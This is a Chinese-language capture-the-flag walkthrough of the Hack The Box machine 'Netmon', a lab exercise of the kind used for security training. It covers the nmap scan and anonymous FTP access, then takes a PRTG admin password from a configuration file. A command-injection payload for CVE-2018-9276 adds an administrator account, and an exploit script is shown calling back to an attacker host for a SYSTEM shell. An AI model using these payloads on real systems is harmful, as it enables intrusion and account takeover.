基本信息

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
$ nmap -sC -sV -Pn 10.10.10.152
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-06 12:49 CST
Nmap scan report for 10.10.10.152
Host is up (0.067s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-11-06T04:49:53
|_  start_date: 2020-11-05T06:38:30

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.25 seconds

21 ftp

FTP可以匿名访问:

80

80是PRTG Network Monitor 18.1.37.13946 :

user flag

user.txt在FTP里:

1
ftp://10.10.10.152/Users/Public/

PRTG Network Monitor

在FTP里查看netmon的安装目录:

1
ftp://10.10.10.152/Program%20Files%20(x86)/PRTG%20Network%20Monitor/

查找相关资料,去查看配置文件:

1
ftp://10.10.10.152/ProgramData/Paessler/PRTG%20Network%20Monitor/

这个配置文件里得到一组账号密码:

1
2
3
4
<dbpassword>
	      <!-- User: prtgadmin -->
	      PrTg@dmin2018
</dbpassword>

prtgadmin

然后可以去80登录,直接用这个密码是错误的,因为是老的配置文件,可以根据规则把密码改成PrTg@dmin2019(失败的话reset一下机器):

然后根据版本号,搜到一个漏洞:

很常规的命令注入

CVE-2018-9276

Setup > Account Settings > Notifications.

Add new notification,在Execute Program那里注入命令:

1
abc.txt | net user miao abc123! /add ; net localgroup administrators miao /add

然后去点击触发:

编码问题很容易导致失败(也可能是延迟问题,我用python打完后发现meterpreter那里弹回来一堆,都是之前测试的),找到别人写的一个python:

一键打

root flag

直接exp打到system shell 读取root.txt:

1
2
3
python netmon.py --rhost http://10.10.10.152 --username prtgadmin --password PrTg@dmin2019 --lhost 10.10.14.7 --lport 4447

type C:\Users\Administrator\Desktop\root.txt

参考资料